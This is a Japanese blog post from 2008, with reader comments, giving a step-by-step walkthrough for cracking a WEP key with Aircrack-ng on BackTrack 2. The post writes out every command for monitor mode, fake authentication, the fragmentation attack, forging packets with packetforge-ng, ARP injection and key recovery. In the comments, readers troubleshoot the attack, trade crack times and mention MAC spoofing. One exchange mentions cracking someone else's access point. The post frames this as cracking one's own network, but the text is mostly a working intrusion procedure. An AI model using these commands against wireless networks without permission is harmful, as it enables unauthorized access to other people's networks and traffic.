atc-500 さん
-
nice! 1256
記事 918
テーマ パソコン・インターネット
プロフィール
ブログを紹介する
【無線LAN crack】 フラグメンテーションアタック buffalo WLI-U2-SG54HP [Aircrack-ng]
バッファローWLI-U2-SG54HP(ralink rt73)での無線LAN WEPキークラックです。
LinuxはBackTrack 2です。
前回は安定して解読できませんでした。
http://blog.so-net.ne.jp/royalwin/2008-01-26
ところがFragmentation Attackで安定してWEPキークラックができるようになりました。
一番簡単なwesside-ng(auto-magic tool)は残念ながらerrorでNGですが、Hand by HandでWEPキークラックに要する時間約5分です。
ポイントはドライバーです。当初はダルムシュタット工科大学のページ<http://homepages.tu-darmstadt.de/~p_larbig/wlan/>から最新のrt73-k2wrlz-2.0.1.tar.bz2を導入してましたが、arpリクエストのパケットインジェクション(パケットを大量に注入)が途中でハングしてしまいます。
Forumで2.0.1より1.1.0の方で成功したという情報があったので、rt73-k2wrlz-1.1.0.tar.bz2を導入しました。
このバージョンも導入方法は同じです。rtmp_def.h書き換えないとWLI-U2-SG54HPを認識しないので是非参照してください。<http://blog.so-net.ne.jp/royalwin/2008-01-18-1>
JIXBO→無線LANアクセスポイントのessid。
00:0D:02:4E:3F:E8→無線LANアクセスポイントのMACアドレス。
00:16:01:CA:87:ED→無線LANアダプタWLI-U2-SG54HPのMACアドレス。
無線LANAPのessidとMACアドレスはiwlist rausb0 scan コマンドで調べておきます。
自分の無線LANアダプタのMACアドレスは iwconfig rausb0 コマンドで調べておきます。
ifconfig rausb0 up
iwconfig rausb0 mode monitor
無線LANアダプタがmonitorモードになり、無線LAN上の全てのパケットをキャプチャしてファイルに保存できます。
fakeauthで無線LANAPに自分のMACアドレスを認証させます。これでAPがARPリクエストに応答してくれます。
aireplay-ng -1 0 -e JIXBO -a 00:0D:02:4E:3F:E8 -h 00:16:01:CA:87:ED rausb0
次にfragmentation attackでキーストリームをfragment-XXXX-XXXXXX.xorファイルに保存します。
aireplay-ng -5 -b 00:0D:02:4E:3F:E8 -h 00:16:01:CA:87:ED rausb0
fragment-XXXX-XXXXXX.xorを基にarp-request用データファイルを作成します。
packetforge-ng -0 -a 00:0D:02:4E:3F:E8 -h 00:16:01:CA:87:ED -k 255.255.255.255 -l 255.255.255.255 -y fragment-0202-144449.xor -w arp-request
arpリクエストパケットをinjection(注入)します。
aireplay-ng -2 -r arp-request rausb0
別のコンソールウインドウを開き、キャプチャを開始します。キャプチャファイルdump-XX.capが生成されます。
airodump-ng -c 8 --bssid 00:0D:02:4E:3F:E8 -w dump rausb0
#Dataが増加すればインジェクション成功です。128bit WEPキーの場合#Dataが40,000以上必要です。
#Dataが40,000以上になったら別のコンソールウインドウを開き、WEPキーの解読です。
aircrack-ng -z dump*.cap
キャプチャファイルは約5MBです。
トラックバック 1
【無線LAN crack】 buffalo WLI-U2-SG54HP(Ralink rt73)128bit WEPのCrack(Royal Windows 2008-02-04 16:16)
うーん.... バッファロー WLI-U2-SG54HP(Ralink rt73)で家庭の無線LANクラックを試してみたのですが、一度だけ成功で安定してクラックできません。 後日安定してクラックできる方法が分かりました。http://blog.so-net.ne.jp/roy…[続く]
この記事のトラックバックURL:
いつもお世話になっております。不具合系統??みたいなのがあります。
Aircrack-ng 1.0.0 RCを入れたら、
aireplay-ng -1 0 -e JIXBO -a 00:0D:02:4E:3F:E8 -h 00:16:01:CA:87:ED rausb0
これと、
aireplay-ng -5 -b 00:0D:02:4E:3F:E8 -h 00:16:01:CA:87:ED rausb0
これが、30分以上経ってもコマンド下記の画像の最初のログが残り、進まなくなります。(bt~:のコマンド入力欄が出てこない)
以前、Aircrack-ngを、Pentest Wirelessのアップデートでやった時は大丈夫だったのですが、何故でしょうか?
どうか、ご教授お願いしたいのですが。。。それと、Aircrack-ng1.0.0 RCの、Wesside-ngのコマンド、最初は10分でクラック出来ました。2回目、40分、3回目8分等、時間もばらばらで、キーも変えてないのに、そんな感じです。どうか、そちらも お試し、宜しくお願い致します。
by 蠍 (2008-07-06 23:26)
すみません。airmon-ng start wifi0
airodump-ng --bssid --channel -w /tmp/名前
これを最初にやる事によって、Aireplay等が初めて動くそうです。
不具合では無かった様でした。誠にすみません。
ちなみに、ノークライアントの状態で、コマンド打つ速さを省いたクラック時間が、2分30秒でした。唖然としました。Wesside-ngの場合よりか遥かに早い。キー打つ時間を入れても、30分以上こっちのほうが早く出来ました。誠にありがとうございました。
by 蠍 (2008-07-07 22:00)
ありがとうございます。
多忙でコメント見てませんでした。
2分30秒ってすごいですね。
wesside-ngで他人のAPをクラックしちゃうという件、もう解決しちゃってるかもしれませんが、
airmon-ngでmonitorモードにする前に、
ifconfig ath0 up
iwlist ath0 scan
で近辺のAPをリストできます。
自分のAPのbssidやchannelを確認します。
大体bssidがAPのMACアドレスなので
-v オプションで自分のAPのMACアドレスを入力する。
wesside-ng -i ath0 -v XX:XX:XX:XX:XX:XX
またはairmon-ng start wifi0 8
で自分のAPのchannelのみモニターするなど。
by atc-500 (2008-07-07 23:55)
こちらこそすみません。忙しい中、コメント誠にありがとうございます。
出来ました。ありがとうございます。
それと、友達のPCにもインストールしてと言われ、ノートPCの方に、インストールした所、ウル覚えですが、
VFS Unable
atkbd.c ~ isa0060/serio0
みたいなエラーが出まして、インストールは出来たのですが、起動しません。原因分かりますでしょうか?
どうか、宜しくお願い致します。
by 蠍 (2008-07-09 12:53)
Backtrackが起動しないんですか?
atkbd.c ~ isa0060/serio0
はキーボードの問題で、BIOSでレガシーUSBのサポートをOffにするといいみたいです。
http://d.hatena.ne.jp/subuntu/20070806
VFS Unableは?です。
by atc-500 (2008-07-10 00:29)
コメント誠にありがとうございます。
UbuntuでBOOTLODERを設定していたので、Ubuntu消して、LiloをBOOTローダーにしたら起動致しました。
それにしてもノートPCなのにUSBも何も無いですよね?
昔のPCでも同じようなエラーが出まして、自分なりにやってみましたが、やり方を忘れてしまい、質問した次第です。
ちなみにLiloの編集で、Viが使いにくかったため、KWriteで編集致しました。
誠にありがとうございました。
by 蠍 (2008-07-10 07:42)
いつもお世話になっております。
Aircrack-PTWで、やってみたら、無駄な解析の動き等をモニターリングしないので、非常に軽く、Pen3 1.2Ghz メモリ256のノートPC環境で、キー打つ速度を抜かして、約、1分半で解析終わりました。
キー入力速度を入れたら、約10分以下でしょうか?
非常に早く済みますよ。お試ししてみて下さいませ。
また、何故か、机の上で、やると、aireplay-ng -5 -b 00:0D:02:4E:3F:E8 -h 00:16:01:CA:87:ED rausb0コマンドで、パケットが溜まりに溜まって、Read 105000Packetsになっても、先に進まない現象があります。何故だかわかりますか?
どうか、宜しくお願い致します。
by 蠍 (2008-07-11 12:31)
いやーすごい!
どんどん先行っちゃってますね。
先に進まないという現象ですが、このコマンドでたまに失敗がありました。原因は分かりません。
別terminalからkill してやりなおしてました。
by atc-500 (2008-07-11 23:24)
いやーwそうでもないっすよw
承知致しました。。原因が分かりましたので、下記参考
最初の、-1 0コマンドで、ミスると箇条書きで、下に説明文が出てきました。
これをミスると、OPNになりませんので、Arpリクエストが通らないと言う状況が発生致します。
ちなみに、MACアドレスを偽装等はやっておりますか?
MACCHANGEを入れましたが、何故かチップセットネーム(KNOWN)と出ます。この状態で、-1 0コマンドをやろうとしても、箇条書きが出てしまい不可能です。尚、BackTrack3の詳細HDDインストールは記載致します予定がございますか?
予定がございましたら、お願いしたいのですが、どうか、宜しくお願い致します。また、BackTrack2の日本語版が出回っていますので、そちらもご参考にお試し如何でしょうか?どうか、宜しくお願い致します。
下記aircrack-PTWのクラック速度詳細
35000パケット以上で、約5秒で128Bitクラック完了
by 蠍 (2008-07-11 23:34)
すごい。
どんどん先行っちゃってますね。
aireplay-ng -5は先に進まない時がありました。
よくわからないけど、キーストリームの取得ができなかったのか?
その時は別のterminalからkillしてやり直してました。
by atc-500 (2008-07-12 00:03)
すぐコメントが反映されないんで、重複しちゃいました。
PTWは確かarpパケット専用でaircrak-ngも0.9からPTWmethodを採用してるはずです。
新しいのがでたのかなあ?
BT3finalはGUIのinstallerをやめちゃったみたいで、shellでやるみたいです。
http://forums.remote-exploit.org/showthread.php?t=14751
1回やったけど簡単でしたよ。
by atc-500 (2008-07-12 00:24)
コメント誠にありがとうございます。
何故か知りませんが、Ptwの方が無駄な動きが無く早いです。
日本語版Bt2入れましたが、英国より使い易くてびっくり致しました。ぜひお試し下さいませ。笑
by 蠍 (2008-07-13 23:23)
ご多忙の中すいません。
BT2を使ってSG54HPで試みているのですが一番最初のところで
sending Authentication Request (open system)
sending Authentication Request (open system)
以下繰り返し
となってしまい進みません・・・・ MACフィルタリングはかけていませんし、距離も近いので原因とは思えません。
それとiwconfig rausb0 mode monitorでモニターモードにすると監視するCHが必ず1になってしまいます。
これも含め何か分かることはありませんでしょうか?
by にゃー (2008-09-15 19:14)
airmon-ng start rausb0 8 (8はチャネル適宜変更)でmonitor modeにしてみたらどうでしょうか?
by atc-500 (2008-09-16 00:37)
モニターモードの方はairmon-ngでいきました。
しかし、やはり最初のやつがあれの繰り返しになってしまいます…どうしてでしょうか?
by にゃー (2008-09-16 02:36)
パラメータを変えて
aireplay-ng -1 6000 -o 1 -q 10 -e essid 以下同じ
でどうでしょうか?
またはインジェクションできるドライバを使ってますでしょうか。
ダルムシュタット工科大学のralinkドライバを使う必要があるかもしれません。
aireplay-ng --test -e essid -a APのMACアドレス rausb0
でInjection is working!と表示されますでしょうか?
by atc-500 (2008-09-16 22:07)
255.255.255.255
を含む文をうちこむと
英語で
「このIPアドレスは無効です」
というような文がかえってくるのですが、どういうことかわかりますでしょうか?
by まゆらー (2009-09-13 20:21)
ちょっと見当がつきませんが、エラーメッセージの英文を教えてもらえますか?
by atc-500 (2009-09-18 02:07)
255.255.255.255を含む…
無線LANセキュリティーの強化書によると
ユーザーがAPに無線LAN経由で接続していない場合に使う
Fragmentation attackの実行で使う様です。
Packetforge-ngでパケットを生成する時に
Packetforge-ng -0 -a <AP・MACアドレス> -h <無線LANクライアント・MACアドレス> -k 255.255.255.255 -l 255.255.255.255 -y <作成されたPRGA> -w <生成するパケット名>
とすればよい。
と書かれています。
by Kaz (2009-09-18 19:45)
Packetforge-ng
を実行すると
本当だったら.xorが作成されるはずなのですが
sending fragmented Packet
Not enough acks, repeating…
No answer,repeating…
Trying a LLC NULL Packet
という返事が無限ループしてしまいます
たまに偶然成功するときもありますが100回に一回くらいです…。
どういうことでしょうか?
by アームストロング (2009-10-04 16:22)
アームストロングさん
このページの下方に"Not enough acks, repeating" message の記載があります。
http://www.aircrack-ng.org/doku.php?id=fragmentation
読んでみると考えられる理由は
・APが近すぎるか遠すぎる。
・atheros チップのWLANカードで madwifi を使っている場合はドライバを最新にするかmac80211は使わない。
使っているのはatherosチップのWLANカードですか?
by atc-500 (2009-10-05 12:18)
ありがとうございます
使っている無線子機は
チップセットが
「Ralink2573USB」です。
ちなみにドライバは
「rt73usb」です。
Atherosではないので?
>APが近すぎるか遠すぎる。
とうことですか?
by アームストロング (2009-10-05 18:10)